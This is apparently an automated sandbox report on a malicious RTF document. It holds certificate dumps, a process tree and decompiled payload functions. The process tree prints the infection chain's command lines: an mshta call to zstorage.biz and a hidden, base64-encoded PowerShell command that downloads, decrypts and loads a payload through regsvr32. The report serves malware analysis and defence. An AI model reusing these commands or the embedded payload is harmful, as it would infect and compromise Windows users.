70 73 2E 72 6F 6F ."http://cps.roo0010: 74 2D 78 31 2E 6C 65 74 73 65 6E 63 72 79 70 74 t-x1.letsencrypt0020: 2E 6F 72 67 .org]] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]]] Algorithm: [SHA256withRSA] Signature:0000: DD 33 D7 11 F3 63 58 38 DD 18 15 FB 09 55 BE 76 .3...cX8.....U.v0010: 56 B9 70 48 A5 69 47 27 7B C2 24 08 92 F1 5A 1F V.pH.iG'..$...Z.0020: 4A 12 29 37 24 74 51 1C 62 68 B8 CD 95 70 67 E5 J.)7$tQ.bh...pg.0030: F7 A4 BC 4E 28 51 CD 9B E8 AE 87 9D EA D8 BA 5A ...N(Q.........Z0040: A1 01 9A DC F0 DD 6A 1D 6A D8 3E 57 23 9E A6 1E ......j.j.>W#...0050: 04 62 9A FF D7 05 CA B7 1F 3F C0 0A 48 BC 94 B0 .b.......?..H...0060: B6 65 62 E0 C1 54 E5 A3 2A AD 20 C4 E9 E6 BB DC .eb..T..*. .....0070: C8 F6 B5 C3 32 A3 98 CC 77 A8 E6 79 65 07 2B CB ....2...w..ye.+.0080: 28 FE 3A 16 52 81 CE 52 0C 2E 5F 83 E8 D5 06 33 (.:.R..R.._....30090: FB 77 6C CE 40 EA 32 9E 1F 92 5C 41 C1 74 6C 5B .wl.@.2...\A.tl[00A0: 5D 0A 5F 33 CC 4D 9F AC 38 F0 2F 7B 2C 62 9D D9 ]._3.M..8./.,b..00B0: A3 91 6F 25 1B 2F 90 B1 19 46 3D F6 7E 1B A6 7A ..o%./...F=....z00C0: 87 B9 A3 7A 6D 18 FA 25 A5 91 87 15 E0 F2 16 2F ...zm..%......./00D0: 58 B0 06 2F 2C 68 26 C6 4B 98 CD DA 9F 0C F9 7F X../,h&.K.......00E0: 90 ED 43 4A 12 44 4E 6F 73 7A 28 EA A4 AA 6E 7B ..CJ.DNosz(...n.00F0: 4C 7D 87 DD E0 C9 02 44 A7 87 AF C3 34 5B B4 42 L......D....4[.B]
Nov 21, 2017 22:22:10.869261980 MEZ	443	49168	185.82.23.166	192.168.2.2	CN=zstorage.biz	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	Thu Oct 26 12:23:36 CEST 2017	Wed Jan 24 11:23:36 CET 2018	[[ Version: V3 Subject: CN=zstorage.biz Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 23560700598155367255315356602121003432706908288835855806175453142275684183727732665375861115460690686442629520255232730871945167149619588096888963659462152088362214534919479611432975068412248966013428653289800435820351547288949606255968682109922484026520660436163269540296092501689321875992312273456192201077009298817132640269315981044667471396071902116147788500314408855792891315166831693364633710099928935493927017174929650643689955650638558279959550008506883415245120150494950552896989622659621453579338794750003618704914413330474880241269693199713330959838743202638447520620106470949347210404964688977630602115739 public exponent: 65537 Validity: [From: Thu Oct 26 12:23:36 CEST 2017, To: Wed Jan 24 11:23:36 CET 2018] Issuer: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US SerialNumber: [ 038ee404 e483a226 3ec278aa 38ce735a 8fd9]Certificate Extensions: 8[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://ocsp.int-x3.letsencrypt.org, accessMethod: caIssuers accessLocation: URIName: http://cert.int-x3.letsencrypt.org/]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:false PathLen: undefined][4]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 1A 68 74 74 70 3A 2F 2F 63 70 73 2E 6C 65 74 ..http://cps.let0010: 73 65 6E 63 72 79 70 74 2E 6F 72 67 sencrypt.org], PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.2 qualifier: 0000: 30 81 9E 0C 81 9B 54 68 69 73 20 43 65 72 74 69 0.....This Certi0010: 66 69 63 61 74 65 20 6D 61 79 20 6F 6E 6C 79 20 ficate may only 0020: 62 65 20 72 65 6C 69 65 64 20 75 70 6F 6E 20 62 be relied upon b0030: 79 20 52 65 6C 79 69 6E 67 20 50 61 72 74 69 65 y Relying Partie0040: 73 20 61 6E 64 20 6F 6E 6C 79 20 69 6E 20 61 63 s and only in ac0050: 63 6F 72 64 61 6E 63 65 20 77 69 74 68 20 74 68 cordance with th0060: 65 20 43 65 72 74 69 66 69 63 61 74 65 20 50 6F e Certificate Po0070: 6C 69 63 79 20 66 6F 75 6E 64 20 61 74 20 68 74 licy found at ht0080: 74 70 73 3A 2F 2F 6C 65 74 73 65 6E 63 72 79 70 tps://letsencryp0090: 74 2E 6F 72 67 2F 72 65 70 6F 73 69 74 6F 72 79 t.org/repository00A0: 2F /]] ]][5]: ObjectId: 2.5.29.37 Criticality=falseExtendedKeyUsages [ serverAuth clientAuth][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_Encipherment][7]: ObjectId: 2.5.29.17 Criticality=falseSubjectAlternativeName [ DNSName: zstorage.biz][8]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: E5 E8 D0 AA 71 13 06 D3 EA 3B D0 8C 02 93 73 A7 ....q....;....s.0010: 7E F3 87 9B ....]]] Algorithm: [SHA256withRSA] Signature:0000: 38 71 C9 B8 56 2B F3 B4 47 C2 6B 8A 3D 1E D8 67 8q..V+..G.k.=..g0010: F4 12 90 1F 05 F6 92 94 F7 1C 8E B8 50 C9 2D 88 ............P.-.0020: 78 4F C9 F3 44 C6 5D AB 0C B1 E4 24 31 1C 54 1E xO..D.]....$1.T.0030: FF 4A 63 8A 1C 1C F6 89 10 6C 03 C0 FA E4 84 57 .Jc......l.....W0040: 0A 52 64 93 15 88 F3 36 07 95 D0 D8 01 59 F4 A0 .Rd....6.....Y..0050: 61 4C 45 E7 8B 57 60 31 55 8A CC DF 6F 8F 1D 94 aLE..W`1U...o...0060: B6 18 CF 64 94 F7 F1 BB 1F 0E 87 3B 6B 0F AF 4D ...d.......;k..M0070: D1 AE 34 B6 B3 9B 5D B1 25 0C EE F5 F6 A0 1A F4 ..4...].%.......0080: AA F2 7B 26 BC 9C 35 AF 0D 50 BE E7 AC C6 F6 F6 ...&..5..P......0090: 9D 81 15 C8 ED 2B 6E F1 7E 25 DB 2F 69 A4 4F B3 .....+n..%./i.O.00A0: 4D 29 48 65 B2 57 41 BD B6 9E F9 6D C1 6A 7F 87 M)He.WA....m.j..00B0: EC A0 0A 85 32 28 0B CB EF 89 30 4C 5C 94 76 F7 ....2(....0L\.v.00C0: 10 BD 58 A6 07 CE 5C BE 04 CA 87 41 D5 C4 57 F1 ..X...\....A..W.00D0: 8F 4E 4F 54 08 6A 55 7E 8E 76 E5 28 77 3A D2 01 .NOT.jU..v.(w:..00E0: E1 94 9C ED 7B 42 8D 13 B4 8D BB 23 6C B2 F1 0F .....B.....#l...00F0: 0B CD B3 17 F2 0E 08 D9 4F 94 C4 A7 92 B9 24 B1 ........O.....$.]
Nov 21, 2017 22:22:10.869261980 MEZ	443	49168	185.82.23.166	192.168.2.2	CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Thu Mar 17 17:40:46 CET 2016	Wed Mar 17 17:40:46 CET 2021	[[ Version: V3 Subject: CN=Let's Encrypt Authority X3, O=Let's Encrypt, C=US Signature Algorithm: SHA256withRSA, OID = 1.2.840.113549.1.1.11 Key: Sun RSA public key, 2048 bits modulus: 19797248476075437682355852246492227182925025209894527646389863306257272162327717438476096960751529894413137923782807258828237626757946953550223743258656059351948211427799114263948499232121738590221774214131983890556391436336270214266656447169277800971416884432628642288505627878176138101439755752196484972290641499489076846352390454201028735981960275647482014359370041238010607728611828345534572152635280172155598035959878659370929022966413402097129857505568509453268467065766156311136296802046438183697980908977865999500405760226706893415483460747503705792669060406182022181441316967415301631965711690685520847684499 public exponent: 65537 Validity: [From: Thu Mar 17 17:40:46 CET 2016, To: Wed Mar 17 17:40:46 CET 2021] Issuer: CN=DST Root CA X3, O=Digital Signature Trust Co. SerialNumber: [ 0a014142 00000153 85736a0b 85eca708]Certificate Extensions: 7[1]: ObjectId: 1.3.6.1.5.5.7.1.1 Criticality=falseAuthorityInfoAccess [ [ accessMethod: ocsp accessLocation: URIName: http://isrg.trustid.ocsp.identrust.com, accessMethod: caIssuers accessLocation: URIName: http://apps.identrust.com/roots/dstrootcax3.p7c]][2]: ObjectId: 2.5.29.35 Criticality=falseAuthorityKeyIdentifier [KeyIdentifier [0000: C4 A7 B1 A4 7B 2C 71 FA DB E1 4B 90 75 FF C4 15 .....,q...K.u...0010: 60 85 89 10 `...]][3]: ObjectId: 2.5.29.19 Criticality=trueBasicConstraints:[ CA:true PathLen:0][4]: ObjectId: 2.5.29.31 Criticality=falseCRLDistributionPoints [ [DistributionPoint: [URIName: http://crl.identrust.com/DSTROOTCAX3CRL.crl]]][5]: ObjectId: 2.5.29.32 Criticality=falseCertificatePolicies [ [CertificatePolicyId: [2.23.140.1.2.1][] ] [CertificatePolicyId: [1.3.6.1.4.1.44947.1.1.1][PolicyQualifierInfo: [ qualifierID: 1.3.6.1.5.5.7.2.1 qualifier: 0000: 16 22 68 74 74 70 3A 2F 2F 63 70 73 2E 72 6F 6F ."http://cps.roo0010: 74 2D 78 31 2E 6C 65 74 73 65 6E 63 72 79 70 74 t-x1.letsencrypt0020: 2E 6F 72 67 .org]] ]][6]: ObjectId: 2.5.29.15 Criticality=trueKeyUsage [ DigitalSignature Key_CertSign Crl_Sign][7]: ObjectId: 2.5.29.14 Criticality=falseSubjectKeyIdentifier [KeyIdentifier [0000: A8 4A 6A 63 04 7D DD BA E6 D1 39 B7 A6 45 65 EF .Jjc......9..Ee.0010: F3 A8 EC A1 ....]]] Algorithm: [SHA256withRSA] Signature:0000: DD 33 D7 11 F3 63 58 38 DD 18 15 FB 09 55 BE 76 .3...cX8.....U.v0010: 56 B9 70 48 A5 69 47 27 7B C2 24 08 92 F1 5A 1F V.pH.iG'..$...Z.0020: 4A 12 29 37 24 74 51 1C 62 68 B8 CD 95 70 67 E5 J.)7$tQ.bh...pg.0030: F7 A4 BC 4E 28 51 CD 9B E8 AE 87 9D EA D8 BA 5A ...N(Q.........Z0040: A1 01 9A DC F0 DD 6A 1D 6A D8 3E 57 23 9E A6 1E ......j.j.>W#...0050: 04 62 9A FF D7 05 CA B7 1F 3F C0 0A 48 BC 94 B0 .b.......?..H...0060: B6 65 62 E0 C1 54 E5 A3 2A AD 20 C4 E9 E6 BB DC .eb..T..*. .....0070: C8 F6 B5 C3 32 A3 98 CC 77 A8 E6 79 65 07 2B CB ....2...w..ye.+.0080: 28 FE 3A 16 52 81 CE 52 0C 2E 5F 83 E8 D5 06 33 (.:.R..R.._....30090: FB 77 6C CE 40 EA 32 9E 1F 92 5C 41 C1 74 6C 5B .wl.@.2...\A.tl[00A0: 5D 0A 5F 33 CC 4D 9F AC 38 F0 2F 7B 2C 62 9D D9 ]._3.M..8./.,b..00B0: A3 91 6F 25 1B 2F 90 B1 19 46 3D F6 7E 1B A6 7A ..o%./...F=....z00C0: 87 B9 A3 7A 6D 18 FA 25 A5 91 87 15 E0 F2 16 2F ...zm..%......./00D0: 58 B0 06 2F 2C 68 26 C6 4B 98 CD DA 9F 0C F9 7F X../,h&.K.......00E0: 90 ED 43 4A 12 44 4E 6F 73 7A 28 EA A4 AA 6E 7B ..CJ.DNosz(...n.00F0: 4C 7D 87 DD E0 C9 02 44 A7 87 AF C3 34 5B B4 42 L......D....4[.B]

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 3116 Parent PID: 2840

General

Start time:	22:21:13
Start date:	21/11/2017
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /n 'C:\Users\user\Desktop\5ZFXLxew8B.rtf
Imagebase:	0x66580000
File size:	1423008 bytes
MD5 hash:	5D798FF0BE2A8970D932568068ACFD9D
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: EQNEDT32.EXE PID: 3172 Parent PID: 548

General

Start time:	22:21:15
Start date:	21/11/2017
Path:	C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x6fb00000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: mshta.exe PID: 3196 Parent PID: 3172

General

Start time:	22:21:15
Start date:	21/11/2017
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	mshta https://zstorage.biz/read.txt & XXXXXX C
Imagebase:	0x753b0000
File size:	13312 bytes
MD5 hash:	ABDFC692D9FE43E2BA8FE6CB5A8CB95A
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: powershell.exe PID: 3488 Parent PID: 3196

General

Start time:	22:21:59
Start date:	21/11/2017
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWgBlAHIAbwBzADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEIAbABvAGMAawBTAGkAegBlACAAPQAgADEAMgA4ADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEsAZQB5AFMAaQB6AGUAIAA9ACAAMgA1ADYAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4ASQBWACAAPQAgACQAbgBnAEMAbQBJAHcAWQBbADAALgAuADEANQBdADsAJABqADEAWgBTAEsAVgBFAEQAMwAuAEsAZQB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAnAE0AVABZADUAUgBqAEoARwBNAEQAZABGAFEAVQBSAEcAUgBEAFUAegBNAEQASQB3AE4AagBKAEMATQBFAFkAMQBSAGsAVQAxAE0AMABKAEMATgB6AFEAPQAnACkAOwAkAHcANgBxAFoAVwBTAGYAZgAgAD0AIAAkAGoAMQBaAFMASwBWAEUARAAzAC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAApADsAJABnAHEAQQAgAD0AIAAkAHcANgBxAFoAVwBTAGYAZgAuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAG4AZwBDAG0ASQB3AFkALAAgADEANgAsACAAJABuAGcAQwBtAEkAdwBZAC4ATABlAG4AZwB0AGgAIAAtACAAMQA2ACkAOwAkAHMAbAAgAD0AKABbAGMAaABhAHIAXQA5ADIAKQA7ACQAZgBmACAAPQAgACQAZQBuAHYAOgBhAHAAcABkAGEAdABhACAAKwAgACQAcwBsACAAKwAgAC0AagBvAGkAbgAgACgAKAA2ADUALgAuADkAMAApACAAKwAgACgAOQA3AC4ALgAxADIAMgApACAAfAAgAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAtAEMAbwB1AG4AdAAgADEAMAAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApACAAKwAgACcALgB0AHgAdAAnADsAWwBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAGYAZgAsACAAJABnAHEAQQApADsAaQBmACAAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAZgBmACkAIAB7ACQAbQBpACAAPQAgACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAgACsAIAAkAHMAbAA7ACQAZQAyACAAPQAgACcAcgBlAGcAcwB2AHIAMwAyAC4AZQB4AGUAJwA7AGkAZgAgACgAWwBTAHkAcwB0AGUAbQAuAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADQAKQAgAHsAIAAkAG0AaQAgAD0AIAAkAG0AaQAgACsAIAAnAFMAeQBzAHQAZQBtADMAMgAnACAAKwAgACQAcwBsACAAKwAgACQAZQAyADsAfQAgAGUAbABzAGUAIAB7ACAAJABtAGkAIAA9ACAAJABtAGkAIAArACAAJwBTAHkAcwBXAE8AVwA2ADQAJwAgACsAIAAkAHMAbAAgACsAIAAkAGUAMgA7AH0AJAB4ADAAPQAoAFsAYwBoAGEAcgBdADMANAApADsAJABhAHIAZwAxACAAPQAgACcALwBzACAAJwAgACsAIAAkAHgAMAAgACsAIAAkAGYAZgAgACsAIAAkAHgAMAA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAkAG0AaQAgACQAYQByAGcAMQA7AH0A'
Imagebase:	0x755c0000
File size:	452608 bytes
MD5 hash:	92F44E405DB16AC55D97E3BFE3B132FA
Programmed in:	.Net C# or VB.NET
Reputation:	low

Analysis Process: regsvr32.exe PID: 3576 Parent PID: 3488

General

Start time:	22:22:03
Start date:	21/11/2017
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\System32\regsvr32.exe' /s 'C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt'
Imagebase:	0x774a0000
File size:	14848 bytes
MD5 hash:	432BE6CF7311062633459EEF6B242FB5
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: msxsl.exe PID: 3904 Parent PID: 3576

General

Start time:	22:23:27
Start date:	21/11/2017
Path:	C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe
Wow64 process (32bit):
Commandline:	unknown
Imagebase:
File size:	24896 bytes
MD5 hash:	3E9F31B4E2CD423C015D34D63047685E
Programmed in:	C, C++ or other language
Reputation:	low

Analysis Process: regsvr32.exe PID: 3576 Parent PID: 3488

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	42

Executed Functions

Function 10001353, Relevance: 1.5, APIs: 1, Instructions: 14

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E10001353(int _a4, int _a8) {
				char _v4;
				void* _t5;

				_push(0);
				if( *0x100280b4 == 0) {
					_t5 = 0;
				} else {
					_push( *0x100280b4);
					_v4 = 0;
					_t5 = CreateToolhelp32Snapshot(_a4, _a8);
				}
				return _t5;
			}

0x10001355
0x1000135d
0x10001377
0x1000135f
0x1000135f
0x10001366
0x10001371
0x10001371
0x1000137c

APIs

CreateToolhelp32Snapshot.KERNEL32(10003242,10003242,10003242,00000002,00000000,6322444752203058146B745952425B352C52436A), ref: 10001371

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 10001042, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 33

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10001042() {
				void* _t1;
				void* _t2;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x10028080 = _t1; // executed
				_t2 = E1000AEB0(); // executed
				E1000AAFF(_t2);
				E100091CE();
				E10008040();
				E1000AB28(4, 1, 8, 0x10019b64, 0x10028138);
				 *0x100280e4 = 0x80000001;
				 *0x10028094 = 0;
				E10007008(0x10028088, " ");
				E10007008(0x100280d4, ",");
				E10007008(0x100280cc, L"4FC476AD");
				E10007008(0x1002811c, L"E14E837B10701C329DB29FABF48C9DBE");
				return E10007008(0x10028098, L"037200720E72737B00070E00007307747A70750478027873710D087209700406");
			}

0x10001051
0x10001056
0x1000105b
0x10001060
0x10001065
0x1000106a
0x10001088
0x1000108d
0x10001097
0x100010ad
0x100010be
0x100010cf
0x100010e0
0x100010f6

APIs

HeapCreate.KERNEL32(00000000,00001000,00000000,10001015), ref: 10001051

Part of subcall function 1000AEB0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,10001060,00000000,00001000,00000000,10001015), ref: 1000AEBC
Part of subcall function 1000AEB0: HeapAlloc.KERNEL32(008B0000,00000000,00004010,?,10001060,00000000,00001000,00000000,10001015), ref: 1000AEEA

Part of subcall function 10008040: HeapCreate.KERNELBASE(00000000,00001000,00000000,1000106F,00000000,00001000,00000000,10001015), ref: 10008049

Part of subcall function 1000AB28: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,1000108D,00000004,00000001,00000008,10019B64,10028138,00000000,00001000,00000000), ref: 1000AB58
Part of subcall function 1000AB28: memset.MSVCRT ref: 1000AB93

Strings

4FC476AD, xrefs: 100010C3
037200720E72737B00070E00007307747A70750478027873710D087209700406, xrefs: 100010E5
E14E837B10701C329DB29FABF48C9DBE, xrefs: 100010D4

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000AF60, Relevance: 3.0, APIs: 2, Instructions: 46

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000AF60(void* __ecx, void** _a4, intOrPtr _a8) {
				unsigned int _v8;
				intOrPtr _t13;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t20;
				void* _t21;
				void* _t22;
				void* _t31;

				_t13 =  *0x1002c3a4; // 0x0
				_v8 = _t13 - _a8;
				if( *_a4 != 0) {
					_t31 =  *0x1002c5c0; // 0x8b0000
					_t16 = HeapReAlloc(_t31, 0,  *_a4, _v8 + 0xa); // executed
					 *_a4 = _t16;
				} else {
					_t21 =  *0x1002c5c0; // 0x8b0000
					_t22 = RtlAllocateHeap(_t21, 0, _v8 + 0xa); // executed
					 *_a4 = _t22;
				}
				_t17 =  *0x10027730; // 0x8b0930
				E1000B260(_a4,  *_a4, _t17 + _a8, _v8 >> 1);
				_t20 = _a8;
				 *0x1002c3a4 = _t20;
				return _t20;
			}

0x1000af64
0x1000af6c
0x1000af75
0x1000afa2
0x1000afa9
0x1000afb2
0x1000af77
0x1000af80
0x1000af86
0x1000af8f
0x1000af8f
0x1000afba
0x1000afc9
0x1000afce
0x1000afd1
0x1000afd9

APIs

RtlAllocateHeap.NTDLL(008B0000,00000000,?,?,?,1000504E,?,?,?,?,?,00000001,?,00000002), ref: 1000AF86
HeapReAlloc.KERNEL32(008B0000,00000000,00000001,?,?,?,1000504E,?,?,?,?,?,00000001,?,00000002), ref: 1000AFA9

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000AEB0, Relevance: 3.0, APIs: 2, Instructions: 18

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E1000AEB0() {
				void* _t1;
				long _t2;
				void* _t3;
				void* _t4;

				_t1 = HeapCreate(0, 0x1000, 0); // executed
				 *0x1002c5c0 = _t1;
				 *0x1002c3a4 = 0;
				 *0x1002c5c4 = 0x10;
				_t2 =  *0x1002c5c4; // 0x4010
				_t4 =  *0x1002c5c0; // 0x8b0000
				_t3 = HeapAlloc(_t4, 0, _t2);
				 *0x10027730 = _t3;
				return _t3;
			}

0x1000aebc
0x1000aec2
0x1000aec7
0x1000aed1
0x1000aedb
0x1000aee3
0x1000aeea
0x1000aef0
0x1000aef6

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,10001060,00000000,00001000,00000000,10001015), ref: 1000AEBC
HeapAlloc.KERNEL32(008B0000,00000000,00004010,?,10001060,00000000,00001000,00000000,10001015), ref: 1000AEEA

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_1_10000000_regsvr32.jbxd

Function 1000B040, Relevance: 2.5, APIs: 2, Instructions: 30

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E1000B040(void* __ecx, void** _a4, wchar_t* _a8) {
				int _v8;
				void* _t11;
				void* _t14;
				void* _t15;

				_push(__ecx);
				if(_a8 != 0) {
					_v8 = wcslen(_a8);
					_t6 = _v8 + 0xa; // 0x10004f34
					_t14 =  *0x1002c5c0; // 0x8b0000
					_t15 = HeapAlloc(_t14, 0, _v8 + _t6); // executed
					 *_a4 = _t15;
					return E1000B260(_a4,  *_a4, _a8, _v8);
				}
				return _t11;
			}

0x1000b043
0x1000b048
0x1000b056
0x1000b05c
0x1000b063
0x1000b069
0x1000b072
0x00000000
0x1000b082
0x1000b08a

APIs

wcslen.MSVCRT ref: 1000B04E
HeapAlloc.KERNEL32(008B0000,00000000,10004F34,10004F2A), ref: 1000B069

Memory Dump Source

Source File: 00000009.00000001.1623819899.10001000.00000020.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000001.1623173929.10000000.00000002.sdmp
Associated: 00000009.00000001.1624611607.10014000.00000002.sdmp
Associated: 00000009.00000001.1625216526.10018000.00000008.sdmp
Associated: 00000009.00000001.1625873333.10027000.00000004.sdmp
Associated: 00000009.00000001.1626507849.10029000.00000008.sdmp
Associated: 00000009.00000001.1627117946.1002C000.00000004.sdmp
Associated: 00000009.00000001.1627726936.1002D000.00000002.sdmp

Joe Sandbox IDA Plugin

